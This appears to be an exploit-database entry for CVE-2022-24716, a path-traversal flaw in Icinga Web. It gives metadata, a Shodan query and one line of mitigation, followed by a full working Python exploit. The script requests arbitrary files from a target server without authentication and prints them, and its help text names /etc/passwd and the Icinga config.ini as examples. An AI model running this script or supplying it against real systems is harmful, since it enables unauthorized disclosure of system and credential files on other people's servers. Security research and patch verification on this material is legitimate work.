Icinga Web 2.10 - Arbitrary File Disclosure

vendor:

Icinga Web

by:

Jacob Ebben

5.5

CVSS

MEDIUM

Arbitrary File Disclosure

CWE

Product Name: Icinga Web

Affected Version From: <2.8.6

Affected Version To: <2.10

Patch Exists: YES

Related CWE: CVE-2022-24716

CPE: a:icinga:icinga_web:2.10

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2022-24716/

Other Scripts:

Tags: packetstorm,cve,cve2023,icinga,lfi

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Nuclei References: https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py, http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html, https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d, https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw, https://security.gentoo.org/glsa/202208-05

Nuclei Metadata: {'max-request': 3, 'shodan-query': 'title:"Icinga"', 'vendor': 'icinga', 'product': 'icinga_web_2'}

Platforms Tested: Linux

2023

Icinga Web 2.10 – Arbitrary File Disclosure

This exploit allows an attacker to disclose arbitrary files on a target system running Icinga Web version <2.8.6, <2.9.6, <2.10. By exploiting a path traversal vulnerability, the attacker can specify a file to be disclosed and retrieve its contents. The vulnerability is identified by CVE-2022-24716. The exploit is based on the findings outlined in the blog post by SonarSource.

Mitigation:

Update Icinga Web to version 2.8.6 or higher to address this vulnerability. Implement proper input validation and sanitization to prevent path traversal attacks.

Source

Exploit-DB raw data:

#!/usr/bin/env python3

# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/

import argparse
import requests
from termcolor import colored

def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)

def get_normalized_url(url):
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url

def get_proxy_protocol(url):
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'

parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str, 
                help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str, 
                help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
                help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()

if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}

base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE

request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
	print_message("Could not connect to provided URL!", "ERROR")
	exit()

request = requests.get(exploit_url, proxies=proxies)
file_content = request.text

print(file_content)